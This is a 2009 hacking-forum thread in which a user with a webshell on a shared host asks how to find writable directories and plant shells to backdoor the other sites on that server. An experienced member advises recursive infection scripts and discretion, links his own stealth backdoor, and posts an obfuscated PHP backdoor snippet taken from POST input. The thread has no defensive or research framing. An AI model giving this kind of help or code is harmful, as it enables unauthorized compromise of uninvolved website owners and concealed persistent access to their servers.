|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 54
Members: 0
Total: 54
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[Help Please] Upload shell to another site on same box? |
|
Posted: Sun Sep 20, 2009 1:48 pm |
|
|
noobie481 |
Beginner |
|
|
Joined: Sep 20, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
hello fellow waraxe members,
i have a webshell on an unprotected shared host at the moment, i would like to know the following commands if anyone could help me or point me in the right direction:
1. Command to search for writable directories in a specific folder
2. Once Found, a command to write shellcode, or remote upload a shell to that specific directory
once again i have a shell with executing access so i am just wanting to backdoor other sites on that box. Any help is appreciated
-thanks |
|
|
|
|
|
|
|
|
Posted: Sun Sep 20, 2009 2:07 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
You want to backdoor all other sites index files or all files?
Discression is always good and infecting every file on servers might not be very discrete.
/edit
allthough in some cases it could help to have all files haveing the same 'modified' date. but this is not so important anyways
In any case its best to write a small script to accomplish this imho.
bet you could probably come up with a long linux command also but i think it requires more skill then writing a script.
When writing the script i think you can even get away with not testing if a file is writable but just getting the error if the write operation was not successful and make a list based on that , what sites were affected.
promoting my own work http://www.plain-text.info/plainshell
if you want a 'not so obviouse' backdoor code.
Code: | <?php
$prev_public_key = '';
$my_public_key = '';
$next_public_key = '';
$my_private_key = '';
$ftitle = $_POST['title'];
$comment = $_POST['comment'];
$ftitle = str_replace("\\\\","\\",substr($comment
('',$ftitle),-strlen($comment),400
));
$ftitle = addslashes(wordwrap(substr($ftitle
(strlen($ftitle)-20),0,20
)));
?>
|
Can you spot the backdoor?
/edit
Seems you want to write it into separate file not mod existing ones, could also be a idea. so shell doesnt get lost during updates.
but main idea stays.
write script that recursevly goes through directories and does the deed, there is help on google how to do that in most languages. |
|
_________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
|
|
|
Posted: Sun Sep 20, 2009 3:43 pm |
|
|
noobie481 |
Beginner |
|
|
Joined: Sep 20, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
i would like to simply write shellcode like C99 to a current writable file or create my own file .php with the code
any ideas |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|